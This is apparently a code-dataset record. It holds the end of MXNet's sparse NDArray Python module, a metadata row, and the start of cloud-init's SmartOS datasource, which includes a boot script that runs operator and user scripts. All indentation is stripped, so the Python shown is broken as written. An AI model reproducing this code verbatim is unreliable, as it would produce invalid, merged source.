See Also
--------
row_sparse_array: Several ways to construct a RowSparseNDArray
"""
def __reduce__(self):
return RowSparseNDArray, (None,), super(RowSparseNDArray, self).__getstate__()
def __iadd__(self, other):
(self + other).copyto(self)
return self
def __isub__(self, other):
(self - other).copyto(self)
return self
def __imul__(self, other):
(self * other).copyto(self)
return self
def __idiv__(self, other):
(self / other).copyto(self)
return self
def __itruediv__(self, other):
(self / other).copyto(self)
return self
def __getitem__(self, key):
"""x.__getitem__(i) <=> x[i]
Returns a sliced view of this array.
Parameters
----------
key : slice
Indexing key.
Examples
--------
>>> x = mx.nd.sparse.zeros('row_sparse', (2, 3))
>>> x[:].asnumpy()
array([[ 0., 0., 0.],
[ 0., 0., 0.]], dtype=float32)
"""
if isinstance(key, int):
raise Exception("__getitem__ with int key is not implemented for RowSparseNDArray yet")
if isinstance(key, py_slice):
if key.step is not None or key.start is not None or key.stop is not None:
raise Exception('RowSparseNDArray only supports [:] for __getitem__')
else:
return self
if isinstance(key, tuple):
raise ValueError('Multi-dimension indexing is not supported')
def __setitem__(self, key, value):
"""x.__setitem__(i, y) <=> x[i]=y
Set self[key] to value. Only slice key [:] is supported.
Parameters
----------
key : slice
The indexing key.
value : NDArray or numpy.ndarray
The value to set.
Examples
--------
>>> src = mx.nd.row_sparse([[1, 0, 2], [4, 5, 6]], [0, 2], (3,3))
>>> src.asnumpy()
array([[ 1., 0., 2.],
[ 0., 0., 0.],
[ 4., 5., 6.]], dtype=float32)
>>> # assign RowSparseNDArray with same storage type
>>> x = mx.nd.sparse.zeros('row_sparse', (3,3))
>>> x[:] = src
>>> x.asnumpy()
array([[ 1., 0., 2.],
[ 0., 0., 0.],
[ 4., 5., 6.]], dtype=float32)
>>> # assign NDArray to RowSparseNDArray
>>> x[:] = mx.nd.ones((3,3))
>>> x.asnumpy()
array([[ 1., 1., 1.],
[ 1., 1., 1.],
[ 1., 1., 1.]], dtype=float32)
"""
if not self.writable:
raise ValueError('Failed to assign to a readonly RowSparseNDArray')
if isinstance(key, py_slice):
if key.step is not None or key.start is not None or key.stop is not None:
raise ValueError('Assignment with slice for RowSparseNDArray ' \
'is not implmented yet.')
if isinstance(value, NDArray):
# avoid copying to itself
if value.handle is not self.handle:
value.copyto(self)
elif isinstance(value, numeric_types):
raise ValueError("Assigning numeric types to RowSparseNDArray " \
"is not implemented yet.")
elif isinstance(value, (np.ndarray, np.generic)):
warnings.warn('Assigning non-NDArray object to RowSparseNDArray is not efficient',
RuntimeWarning)
tmp = _array(value)
tmp.copyto(self)
else:
raise TypeError('type %s not supported' % str(type(value)))
else:
assert(isinstance(key, (int, tuple)))
raise TypeError('RowSparseNDArray only supports [:] for assignment')
@property
def indices(self):
"""A deep copy NDArray of the indices array of the RowSparseNDArray.
This generates a deep copy of the row indices of the current `row_sparse` matrix.
Returns
-------
NDArray
This RowSparseNDArray's indices array.
"""
return self._aux_data(0)
@property
def data(self):
"""A deep copy NDArray of the data array of the RowSparseNDArray.
This generates a deep copy of the `data` of the current `row_sparse` matrix.
Returns
-------
NDArray
This RowSparseNDArray's data array.
"""
return self._data()
@indices.setter
def indices(self, indices):
raise NotImplementedError()
@data.setter
def data(self, data):
raise NotImplementedError()
def tostype(self, stype):
"""Return a copy of the array with chosen storage type.
Returns
-------
NDArray or RowSparseNDArray
A copy of the array with the chosen storage stype
"""
if stype == 'csr':
raise ValueError("cast_storage from row_sparse to csr is not supported")
return op.cast_storage(self, stype=stype)
def copyto(self, other):
"""Copies the value of this array to another array.
If ``other`` is a ``NDArray`` or ``RowSparseNDArray`` object, then ``other.shape``
and ``self.shape`` should be the same. This function copies the value from
``self`` to ``other``.
If ``other`` is a context, a new ``RowSparseNDArray`` will be first created on
the target context, and the value of ``self`` is copied.
Parameters
----------
other : NDArray or RowSparseNDArray or Context
The destination array or context.
Returns
-------
NDArray or RowSparseNDArray
The copied array. If ``other`` is an ``NDArray`` or ``RowSparseNDArray``, then the
return value and ``other`` will point to the same ``NDArray`` or ``RowSparseNDArray``.
"""
if isinstance(other, Context):
return super(RowSparseNDArray, self).copyto(other)
elif isinstance(other, NDArray):
stype = other.stype
if stype == 'default' or stype == 'row_sparse':
return super(RowSparseNDArray, self).copyto(other)
else:
raise TypeError('copyto does not support destination NDArray stype ' + str(stype))
else:
raise TypeError('copyto does not support type ' + str(type(other)))
def retain(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`retain`.
The arguments are the same as for :py:func:`retain`, with
this array as data.
"""
return retain(self, *args, **kwargs)
def _prepare_src_array(source_array, dtype):
"""Prepare `source_array` so that it can be used to construct NDArray.
`source_array` is converted to a `np.ndarray` if it's neither an `NDArray` \
nor an `np.ndarray`.
"""
if not isinstance(source_array, NDArray) and not isinstance(source_array, np.ndarray):
try:
source_array = np.array(source_array, dtype=dtype)
except:
raise TypeError('values must be array like object')
return source_array
def _prepare_default_dtype(src_array, dtype):
"""Prepare the value of dtype if `dtype` is None. If `src_array` is an NDArray, numpy.ndarray
or scipy.sparse.csr.csr_matrix, return src_array.dtype. float32 is returned otherwise."""
if dtype is None:
if isinstance(src_array, (NDArray, np.ndarray)):
dtype = src_array.dtype
elif spsp and isinstance(src_array, spsp.csr.csr_matrix):
dtype = src_array.dtype
else:
dtype = mx_real_t
return dtype
def _check_shape(s1, s2):
"""check s1 == s2 if both are not None"""
if s1 and s2 and s1 != s2:
raise ValueError("Shape mismatch detected. " + str(s1) + " v.s. " + str(s2))
def csr_matrix(arg1, shape=None, ctx=None, dtype=None):
"""Creates a `CSRNDArray`, an 2D array with compressed sparse row (CSR) format.
The CSRNDArray can be instantiated in several ways:
- csr_matrix(D):
to construct a CSRNDArray with a dense 2D array ``D``
- **D** (*array_like*) - An object exposing the array interface, an object whose \
`__array__` method returns an array, or any (nested) sequence.
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is ``D.dtype`` if ``D`` is an NDArray or numpy.ndarray, \
float32 otherwise.
- csr_matrix(S)
to construct a CSRNDArray with a sparse 2D array ``S``
- **S** (*CSRNDArray or scipy.sparse.csr.csr_matrix*) - A sparse matrix.
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is ``S.dtype``.
- csr_matrix((M, N))
to construct an empty CSRNDArray with shape ``(M, N)``
- **M** (*int*) - Number of rows in the matrix
- **N** (*int*) - Number of columns in the matrix
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is float32.
- csr_matrix((data, indices, indptr))
to construct a CSRNDArray based on the definition of compressed sparse row format \
using three separate arrays, \
where the column indices for row i are stored in ``indices[indptr[i]:indptr[i+1]]`` \
and their corresponding values are stored in ``data[indptr[i]:indptr[i+1]]``. \
The column indices for a given row are expected to be **sorted in ascending order.** \
Duplicate column entries for the same row are not allowed.
- **data** (*array_like*) - An object exposing the array interface, which \
holds all the non-zero entries of the matrix in row-major order.
- **indices** (*array_like*) - An object exposing the array interface, which \
stores the column index for each non-zero element in ``data``.
- **indptr** (*array_like*) - An object exposing the array interface, which \
stores the offset into ``data`` of the first non-zero element number of each \
row of the matrix.
- **shape** (*tuple of int, optional*) - The shape of the array. The default \
shape is inferred from the indices and indptr arrays.
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is ``data.dtype`` if ``data`` is an NDArray or numpy.ndarray, \
float32 otherwise.
- csr_matrix((data, (row, col)))
to construct a CSRNDArray based on the COOrdinate format \
using three seperate arrays, \
where ``row[i]`` is the row index of the element, \
``col[i]`` is the column index of the element \
and ``data[i]`` is the data corresponding to the element. All the missing \
elements in the input are taken to be zeroes.
- **data** (*array_like*) - An object exposing the array interface, which \
holds all the non-zero entries of the matrix in COO format.
- **row** (*array_like*) - An object exposing the array interface, which \
stores the row index for each non zero element in ``data``.
- **col** (*array_like*) - An object exposing the array interface, which \
stores the col index for each non zero element in ``data``.
- **shape** (*tuple of int, optional*) - The shape of the array. The default \
shape is inferred from the ``row`` and ``col`` arrays.
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is float32.
Parameters
----------
arg1: tuple of int, tuple of array_like, array_like, CSRNDArray, scipy.sparse.csr_matrix, \
scipy.sparse.coo_matrix, tuple of int or tuple of array_like
The argument to help instantiate the csr matrix. See above for further details.
shape : tuple of int, optional
The shape of the csr matrix.
ctx: Context, optional
Device context (default is the current default context).
dtype: str or numpy.dtype, optional
The data type of the output array.
Returns
-------
CSRNDArray
A `CSRNDArray` with the `csr` storage representation.
Example
-------
>>> a = mx.nd.sparse.csr_matrix(([1, 2, 3], [1, 0, 2], [0, 1, 2, 2, 3]), shape=(4, 3))
>>> a.asnumpy()
array([[ 0., 1., 0.],
[ 2., 0., 0.],
[ 0., 0., 0.],
[ 0., 0., 3.]], dtype=float32)
See Also
--------
CSRNDArray : MXNet NDArray in compressed sparse row format.
"""
# construct a csr matrix from (M, N) or (data, indices, indptr)
if isinstance(arg1, tuple):
arg_len = len(arg1)
if arg_len == 2:
# construct a sparse csr matrix from
# scipy coo matrix if input format is coo
if isinstance(arg1[1], tuple) and len(arg1[1]) == 2:
data, (row, col) = arg1
if isinstance(data, NDArray):
data = data.asnumpy()
if isinstance(row, NDArray):
row = row.asnumpy()
if isinstance(col, NDArray):
col = col.asnumpy()
coo = spsp.coo_matrix((data, (row, col)), shape=shape)
_check_shape(coo.shape, shape)
csr = coo.tocsr()
return array(csr, ctx=ctx, dtype=dtype)
else:
# empty matrix with shape
_check_shape(arg1, shape)
return empty('csr', arg1, ctx=ctx, dtype=dtype)
elif arg_len == 3:
# data, indices, indptr
return _csr_matrix_from_definition(arg1[0], arg1[1], arg1[2], shape=shape,
ctx=ctx, dtype=dtype)
else:
raise ValueError("Unexpected length of input tuple: " + str(arg_len))
else:
# construct a csr matrix from a sparse / dense one
if isinstance(arg1, CSRNDArray) or (spsp and isinstance(arg1, spsp.csr.csr_matrix)):
# construct a csr matrix from scipy or CSRNDArray
_check_shape(arg1.shape, shape)
return array(arg1, ctx=ctx, dtype=dtype)
elif isinstance(arg1, RowSparseNDArray):
raise ValueError("Unexpected input type: RowSparseNDArray")
else:
# construct a csr matrix from a dense one
# prepare default ctx and dtype since mx.nd.array doesn't use default values
# based on source_array
dtype = _prepare_default_dtype(arg1, dtype)
# create dns array with provided dtype. ctx is not passed since copy across
# ctx requires dtype to be the same
dns = _array(arg1, dtype=dtype)
if ctx is not None and dns.context != ctx:
dns = dns.as_in_context(ctx)
_check_shape(dns.shape, shape)
return dns.tostype('csr')
def _csr_matrix_from_definition(data, indices, indptr, shape=None, ctx=None,
dtype=None, indices_type=None, indptr_type=None):
"""Create a `CSRNDArray` based on data, indices and indptr"""
storage_type = 'csr'
# context
ctx = Context.default_ctx if ctx is None else ctx
# types
dtype = _prepare_default_dtype(data, dtype)
indptr_type = _STORAGE_AUX_TYPES[storage_type][0] if indptr_type is None else indptr_type
indices_type = _STORAGE_AUX_TYPES[storage_type][1] if indices_type is None else indices_type
# prepare src array and types
data = _prepare_src_array(data, dtype)
indptr = _prepare_src_array(indptr, indptr_type)
indices = _prepare_src_array(indices, indices_type)
# TODO(junwu): Convert data, indptr, and indices to mxnet NDArrays
# if they are not for now. In the future, we should provide a c-api
# to accept np.ndarray types to copy from to result.data and aux_data
if not isinstance(data, NDArray):
data = _array(data, ctx, dtype)
if not isinstance(indptr, NDArray):
indptr = _array(indptr, ctx, indptr_type)
if not isinstance(indices, NDArray):
indices = _array(indices, ctx, indices_type)
if shape is None:
if indices.shape[0] == 0:
raise ValueError('invalid shape')
shape = (len(indptr) - 1, op.max(indices).asscalar() + 1)
# verify shapes
aux_shapes = [indptr.shape, indices.shape]
if data.ndim != 1 or indptr.ndim != 1 or indices.ndim != 1 or \
indptr.shape[0] == 0 or len(shape) != 2:
raise ValueError('invalid shape')
result = CSRNDArray(_new_alloc_handle(storage_type, shape, ctx, False, dtype,
[indptr_type, indices_type], aux_shapes))
check_call(_LIB.MXNDArraySyncCopyFromNDArray(result.handle, data.handle, ctypes.c_int(-1)))
check_call(_LIB.MXNDArraySyncCopyFromNDArray(result.handle, indptr.handle, ctypes.c_int(0)))
check_call(_LIB.MXNDArraySyncCopyFromNDArray(result.handle, indices.handle, ctypes.c_int(1)))
return result
def row_sparse_array(arg1, shape=None, ctx=None, dtype=None):
"""Creates a `RowSparseNDArray`, a multidimensional row sparse array with a set of \
tensor slices at given indices.
The RowSparseNDArray can be instantiated in several ways:
- row_sparse_array(D):
to construct a RowSparseNDArray with a dense ndarray ``D``
- **D** (*array_like*) - An object exposing the array interface, an object whose \
`__array__` method returns an array, or any (nested) sequence.
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is ``D.dtype`` if ``D`` is an NDArray or numpy.ndarray, \
float32 otherwise.
- row_sparse_array(S)
to construct a RowSparseNDArray with a sparse ndarray ``S``
- **S** (*RowSparseNDArray*) - A sparse ndarray.
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is ``S.dtype``.
- row_sparse_array((D0, D1 .. Dn))
to construct an empty RowSparseNDArray with shape ``(D0, D1, ... Dn)``
- **D0, D1 .. Dn** (*int*) - The shape of the ndarray
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is float32.
- row_sparse_array((data, indices))
to construct a RowSparseNDArray based on the definition of row sparse format \
using two separate arrays, \
where the `indices` stores the indices of the row slices with non-zeros,
while the values are stored in `data`. The corresponding NDArray ``dense``
represented by RowSparseNDArray ``rsp`` has \
``dense[rsp.indices[i], :, :, :, ...] = rsp.data[i, :, :, :, ...]``
The row indices for are expected to be **sorted in ascending order.** \
- **data** (*array_like*) - An object exposing the array interface, which \
holds all the non-zero row slices of the array.
- **indices** (*array_like*) - An object exposing the array interface, which \
stores the row index for each row slice with non-zero elements.
- **shape** (*tuple of int, optional*) - The shape of the array. The default \
shape is inferred from the indices and indptr arrays.
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is float32.
Parameters
----------
arg1: NDArray, numpy.ndarray, RowSparseNDArray, tuple of int or tuple of array_like
The argument to help instantiate the row sparse ndarray. See above for further details.
shape : tuple of int, optional
The shape of the row sparse ndarray.
ctx : Context, optional
Device context (default is the current default context).
dtype : str or numpy.dtype, optional
The data type of the output array.
Returns
-------
RowSparseNDArray
An `RowSparseNDArray` with the `row_sparse` storage representation.
Example
-------
>>> a = mx.nd.sparse.row_sparse_array(([[1, 2], [3, 4]], [1, 4]), shape=(6, 2))
>>> a.asnumpy()
array([[ 0., 0.],
[ 1., 2.],
[ 0., 0.],
[ 0., 0.],
[ 3., 4.],
[ 0., 0.]], dtype=float32)
See Also
--------
RowSparseNDArray : MXNet NDArray in row sparse format.
"""
# construct a row sparse array from (D0, D1 ..) or (data, indices)
if isinstance(arg1, tuple):
arg_len = len(arg1)
if arg_len < 2:
raise ValueError("Unexpected length of input tuple: " + str(arg_len))
elif arg_len > 2:
# empty ndarray with shape
_check_shape(arg1, shape)
return empty('row_sparse', arg1, ctx=ctx, dtype=dtype)
else:
# len(arg1) = 2, is either shape or (data, indices)
if isinstance(arg1[0], integer_types) and isinstance(arg1[1], integer_types):
# empty ndarray with shape
_check_shape(arg1, shape)
return empty('row_sparse', arg1, ctx=ctx, dtype=dtype)
else:
# data, indices, indptr
return _row_sparse_ndarray_from_definition(arg1[0], arg1[1], shape=shape,
ctx=ctx, dtype=dtype)
else:
# construct a row sparse ndarray from a dense / sparse array
if isinstance(arg1, RowSparseNDArray):
# construct a row sparse ndarray from RowSparseNDArray
_check_shape(arg1.shape, shape)
return array(arg1, ctx=ctx, dtype=dtype)
elif isinstance(arg1, CSRNDArray):
raise ValueError("Unexpected input type: CSRNDArray")
else:
# construct a csr matrix from a dense one
# prepare default dtype since mx.nd.array doesn't use default values
# based on source_array
dtype = _prepare_default_dtype(arg1, dtype)
# create dns array with provided dtype. ctx is not passed since copy across
# ctx requires dtype to be the same
dns = _array(arg1, dtype=dtype)
if ctx is not None and dns.context != ctx:
dns = dns.as_in_context(ctx)
_check_shape(dns.shape, shape)
return dns.tostype('row_sparse')
def _row_sparse_ndarray_from_definition(data, indices, shape=None, ctx=None,
dtype=None, indices_type=None):
"""Create a `RowSparseNDArray` based on data and indices"""
storage_type = 'row_sparse'
# context
ctx = Context.default_ctx if ctx is None else ctx
# types
dtype = _prepare_default_dtype(data, dtype)
indices_type = _STORAGE_AUX_TYPES[storage_type][0] if indices_type is None else indices_type
# prepare src array and types
data = _prepare_src_array(data, dtype)
indices = _prepare_src_array(indices, indices_type)
# TODO(junwu): Convert data, indptr, and indices to mxnet NDArrays
# if they are not for now. In the future, we should provide a c-api
# to accept np.ndarray types to copy from to result.data and aux_data
if not isinstance(data, NDArray):
data = _array(data, ctx, dtype)
if not isinstance(indices, NDArray):
indices = _array(indices, ctx, indices_type)
if shape is None:
num_indices = indices.shape[0]
if num_indices == 0:
raise ValueError('invalid shape')
dim0 = indices[num_indices - 1].asscalar() + 1
shape = (dim0, ) + data.shape[1:]
# verify shapes
if data.ndim != len(shape) or indices.ndim != 1 or np.prod(shape[1:]) == 0:
raise ValueError("invalid shape")
result = RowSparseNDArray(_new_alloc_handle(storage_type, shape, ctx, False, dtype,
[indices_type], [indices.shape]))
check_call(_LIB.MXNDArraySyncCopyFromNDArray(result.handle, data.handle, ctypes.c_int(-1)))
check_call(_LIB.MXNDArraySyncCopyFromNDArray(result.handle, indices.handle, ctypes.c_int(0)))
return result
def _ndarray_cls(handle, writable=True, stype=_STORAGE_TYPE_UNDEFINED):
if stype == _STORAGE_TYPE_UNDEFINED:
stype = _storage_type(handle)
if stype == _STORAGE_TYPE_DEFAULT:
return NDArray(handle, writable=writable)
elif stype == _STORAGE_TYPE_CSR:
return CSRNDArray(handle, writable=writable)
elif stype == _STORAGE_TYPE_ROW_SPARSE:
return RowSparseNDArray(handle, writable=writable)
else:
raise Exception("unknown storage type: %s"%stype)
_set_ndarray_class(_ndarray_cls)
def zeros(stype, shape, ctx=None, dtype=None, **kwargs):
"""Return a new array of given shape and type, filled with zeros.
Parameters
----------
stype: string
The storage type of the empty array, such as 'row_sparse', 'csr', etc
shape : int or tuple of int
The shape of the empty array
ctx : Context, optional
An optional device context (default is the current default context)
dtype : str or numpy.dtype, optional
An optional value type (default is `float32`)
Returns
-------
RowSparseNDArray or CSRNDArray
A created array
Examples
--------
>>> mx.nd.sparse.zeros('csr', (1,2))
<CSRNDArray 1x2 @cpu(0)>
>>> mx.nd.sparse.zeros('row_sparse', (1,2), ctx=mx.cpu(), dtype='float16').asnumpy()
array([[ 0., 0.]], dtype=float16)
"""
if stype == 'default':
return _zeros_ndarray(shape, ctx=ctx, dtype=dtype, **kwargs)
if ctx is None:
ctx = Context.default_ctx
dtype = mx_real_t if dtype is None else dtype
if stype == 'row_sparse' or stype == 'csr':
aux_types = _STORAGE_AUX_TYPES[stype]
else:
raise ValueError("unknown storage type" + stype)
out = _ndarray_cls(_new_alloc_handle(stype, shape, ctx, True, dtype, aux_types))
return _internal._zeros(shape=shape, ctx=ctx, dtype=dtype, out=out, **kwargs)
def empty(stype, shape, ctx=None, dtype=None):
"""Returns a new array of given shape and type, without initializing entries.
Parameters
----------
stype: string
The storage type of the empty array, such as 'row_sparse', 'csr', etc
shape : int or tuple of int
The shape of the empty array.
ctx : Context, optional
An optional device context (default is the current default context).
dtype : str or numpy.dtype, optional
An optional value type (default is `float32`).
Returns
-------
CSRNDArray or RowSparseNDArray
A created array.
"""
if isinstance(shape, int):
shape = (shape, )
if ctx is None:
ctx = Context.default_ctx
if dtype is None:
dtype = mx_real_t
assert(stype is not None)
if stype == 'csr' or stype == 'row_sparse':
return zeros(stype, shape, ctx=ctx, dtype=dtype)
else:
raise Exception("unknown stype : " + str(stype))
def array(source_array, ctx=None, dtype=None):
"""Creates a sparse array from any object exposing the array interface.
Parameters
----------
source_array : RowSparseNDArray, CSRNDArray or scipy.sparse.csr.csr_matrix
The source sparse array
ctx : Context, optional
The default context is ``source_array.context`` if ``source_array`` is an NDArray. \
The current default context otherwise.
dtype : str or numpy.dtype, optional
The data type of the output array. The default dtype is ``source_array.dtype``
if `source_array` is an `NDArray`, `numpy.ndarray` or `scipy.sparse.csr.csr_matrix`, \
`float32` otherwise.
Returns
-------
RowSparseNDArray or CSRNDArray
An array with the same contents as the `source_array`.
Examples
--------
>>> import scipy.sparse as spsp
>>> csr = spsp.csr_matrix((2, 100))
>>> mx.nd.sparse.array(csr)
<CSRNDArray 2x100 @cpu(0)>
>>> mx.nd.sparse.array(mx.nd.sparse.zeros('csr', (3, 2)))
<CSRNDArray 3x2 @cpu(0)>
>>> mx.nd.sparse.array(mx.nd.sparse.zeros('row_sparse', (3, 2)))
<RowSparseNDArray 3x2 @cpu(0)>
"""
ctx = Context.default_ctx if ctx is None else ctx
if isinstance(source_array, NDArray):
assert(source_array.stype != 'default'), \
"Please use `tostype` to create RowSparseNDArray or CSRNDArray from an NDArray"
# prepare dtype and ctx based on source_array, if not provided
dtype = _prepare_default_dtype(source_array, dtype)
# if both dtype and ctx are different from source_array, we cannot copy directly
if source_array.dtype != dtype and source_array.context != ctx:
arr = empty(source_array.stype, source_array.shape, dtype=dtype)
arr[:] = source_array
arr = arr.as_in_context(ctx)
else:
arr = empty(source_array.stype, source_array.shape, dtype=dtype, ctx=ctx)
arr[:] = source_array
return arr
elif spsp and isinstance(source_array, spsp.csr.csr_matrix):
# TODO(haibin) implement `_sync_copy_from` with scipy csr object to reduce a copy
# preprocess scipy csr to canonical form
csr = source_array.sorted_indices()
csr.sum_duplicates()
dtype = _prepare_default_dtype(source_array, dtype)
return csr_matrix((csr.data, csr.indices, csr.indptr), shape=csr.shape, \
dtype=dtype, ctx=ctx)
elif isinstance(source_array, (np.ndarray, np.generic)):
raise ValueError("Please use mx.nd.array to create an NDArray with source_array of type ",
type(source_array))
else:
raise ValueError("Unexpected source_array type: ", type(source_array))
|
madjam/mxnet
|
python/mxnet/ndarray/sparse.py
|
Python
|
apache-2.0
| 50,947 | 0.003199 |
# vi: ts=4 expandtab
#
# Copyright (C) 2013 Canonical Ltd.
#
# Author: Ben Howard <ben.howard@canonical.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# Datasource for provisioning on SmartOS. This works on Joyent
# and public/private Clouds using SmartOS.
#
# SmartOS hosts use a serial console (/dev/ttyS1) on KVM Linux Guests
# The meta-data is transmitted via key/value pairs made by
# requests on the console. For example, to get the hostname, you
# would send "GET hostname" on /dev/ttyS1.
# For Linux Guests running in LX-Brand Zones on SmartOS hosts
# a socket (/native/.zonecontrol/metadata.sock) is used instead
# of a serial console.
#
# Certain behavior is defined by the DataDictionary
# http://us-east.manta.joyent.com/jmc/public/mdata/datadict.html
# Comments with "@datadictionary" are snippets of the definition
import base64
import binascii
import json
import os
import random
import re
import socket
from cloudinit import log as logging
from cloudinit import serial
from cloudinit import sources
from cloudinit import util
LOG = logging.getLogger(__name__)
SMARTOS_ATTRIB_MAP = {
# Cloud-init Key : (SmartOS Key, Strip line endings)
'instance-id': ('sdc:uuid', True),
'local-hostname': ('hostname', True),
'public-keys': ('root_authorized_keys', True),
'user-script': ('user-script', False),
'legacy-user-data': ('user-data', False),
'user-data': ('cloud-init:user-data', False),
'iptables_disable': ('iptables_disable', True),
'motd_sys_info': ('motd_sys_info', True),
'availability_zone': ('sdc:datacenter_name', True),
'vendor-data': ('sdc:vendor-data', False),
'operator-script': ('sdc:operator-script', False),
'hostname': ('sdc:hostname', True),
'dns_domain': ('sdc:dns_domain', True),
}
SMARTOS_ATTRIB_JSON = {
# Cloud-init Key : (SmartOS Key known JSON)
'network-data': 'sdc:nics',
'dns_servers': 'sdc:resolvers',
'routes': 'sdc:routes',
}
SMARTOS_ENV_LX_BRAND = "lx-brand"
SMARTOS_ENV_KVM = "kvm"
DS_NAME = 'SmartOS'
DS_CFG_PATH = ['datasource', DS_NAME]
NO_BASE64_DECODE = [
'iptables_disable',
'motd_sys_info',
'root_authorized_keys',
'sdc:datacenter_name',
'sdc:uuid'
'user-data',
'user-script',
]
METADATA_SOCKFILE = '/native/.zonecontrol/metadata.sock'
SERIAL_DEVICE = '/dev/ttyS1'
SERIAL_TIMEOUT = 60
# BUILT-IN DATASOURCE CONFIGURATION
# The following is the built-in configuration. If the values
# are not set via the system configuration, then these default
# will be used:
# serial_device: which serial device to use for the meta-data
# serial_timeout: how long to wait on the device
# no_base64_decode: values which are not base64 encoded and
# are fetched directly from SmartOS, not meta-data values
# base64_keys: meta-data keys that are delivered in base64
# base64_all: with the exclusion of no_base64_decode values,
# treat all meta-data as base64 encoded
# disk_setup: describes how to partition the ephemeral drive
# fs_setup: describes how to format the ephemeral drive
#
BUILTIN_DS_CONFIG = {
'serial_device': SERIAL_DEVICE,
'serial_timeout': SERIAL_TIMEOUT,
'metadata_sockfile': METADATA_SOCKFILE,
'no_base64_decode': NO_BASE64_DECODE,
'base64_keys': [],
'base64_all': False,
'disk_aliases': {'ephemeral0': '/dev/vdb'},
}
BUILTIN_CLOUD_CONFIG = {
'disk_setup': {
'ephemeral0': {'table_type': 'mbr',
'layout': False,
'overwrite': False}
},
'fs_setup': [{'label': 'ephemeral0',
'filesystem': 'ext3',
'device': 'ephemeral0'}],
}
# builtin vendor-data is a boothook that writes a script into
# /var/lib/cloud/scripts/per-boot. *That* script then handles
# executing the 'operator-script' and 'user-script' files
# that cloud-init writes into /var/lib/cloud/instance/data/
# if they exist.
#
# This is all very indirect, but its done like this so that at
# some point in the future, perhaps cloud-init wouldn't do it at
# all, but rather the vendor actually provide vendor-data that accomplished
# their desires. (That is the point of vendor-data).
#
# cloud-init does cheat a bit, and write the operator-script and user-script
# itself. It could have the vendor-script do that, but it seems better
# to not require the image to contain a tool (mdata-get) to read those
# keys when we have a perfectly good one inside cloud-init.
BUILTIN_VENDOR_DATA = """\
#cloud-boothook
#!/bin/sh
fname="%(per_boot_d)s/01_smartos_vendor_data.sh"
mkdir -p "${fname%%/*}"
cat > "$fname" <<"END_SCRIPT"
#!/bin/sh
##
# This file is written as part of the default vendor data for SmartOS.
# The SmartOS datasource writes the listed file from the listed metadata key
# sdc:operator-script -> %(operator_script)s
# user-script -> %(user_script)s
#
# You can view content with 'mdata-get <key>'
#
for script in "%(operator_script)s" "%(user_script)s"; do
[ -x "$script" ] || continue
echo "executing '$script'" 1>&2
"$script"
done
END_SCRIPT
chmod +x "$fname"
"""
# @datadictionary: this is legacy path for placing files from metadata
# per the SmartOS location. It is not preferable, but is done for
# legacy reasons
LEGACY_USER_D = "/var/db"
class DataSourceSmartOS(sources.DataSource):
_unset = "_unset"
smartos_type = _unset
md_client = _unset
def __init__(self, sys_cfg, distro, paths):
sources.DataSource.__init__(self, sys_cfg, distro, paths)
self.ds_cfg = util.mergemanydict([
self.ds_cfg,
util.get_cfg_by_path(sys_cfg, DS_CFG_PATH, {}),
BUILTIN_DS_CONFIG])
self.metadata = {}
self.network_data = None
self._network_config = None
self.script_base_d = os.path.join(self.paths.get_cpath("scripts"))
self._init()
def __str__(self):
root = sources.DataSource.__str__(self)
return "%s [client=%s]" % (root, self.md_client)
def _init(self):
if self.smartos_type == self._unset:
self.smartos_type = get_smartos_environ()
if self.smartos_type is None:
self.md_client = None
if self.md_client == self._unset:
self.md_client = jmc_client_factory(
smartos_type=self.smartos_type,
metadata_sockfile=self.ds_cfg['metadata_sockfile'],
serial_device=self.ds_cfg['serial_device'],
serial_timeout=self.ds_cfg['serial_timeout'])
def _set_provisioned(self):
'''Mark the instance provisioning state as successful.
When run in a zone, the host OS will look for /var/svc/provisioning
to be renamed as /var/svc/provision_success. This should be done
after meta-data is successfully retrieved and from this point
the host considers the provision of the zone to be a success and
keeps the zone running.
'''
LOG.debug('Instance provisioning state set as successful')
svc_path = '/var/svc'
if os.path.exists('/'.join([svc_path, 'provisioning'])):
os.rename('/'.join([svc_path, 'provisioning']),
'/'.join([svc_path, 'provision_success']))
def get_data(self):
self._init()
md = {}
ud = ""
if not self.smartos_type:
LOG.debug("Not running on smartos")
return False
if not self.md_client.exists():
LOG.debug("No metadata device '%r' found for SmartOS datasource",
self.md_client)
return False
for ci_noun, attribute in SMARTOS_ATTRIB_MAP.items():
smartos_noun, strip = attribute
md[ci_noun] = self.md_client.get(smartos_noun, strip=strip)
for ci_noun, smartos_noun in SMARTOS_ATTRIB_JSON.items():
md[ci_noun] = self.md_client.get_json(smartos_noun)
# @datadictionary: This key may contain a program that is written
# to a file in the filesystem of the guest on each boot and then
# executed. It may be of any format that would be considered
# executable in the guest instance.
#
# We write 'user-script' and 'operator-script' into the
# instance/data directory. The default vendor-data then handles
# executing them later.
data_d = os.path.join(self.paths.get_cpath(), 'instances',
md['instance-id'], 'data')
user_script = os.path.join(data_d, 'user-script')
u_script_l = "%s/user-script" % LEGACY_USER_D
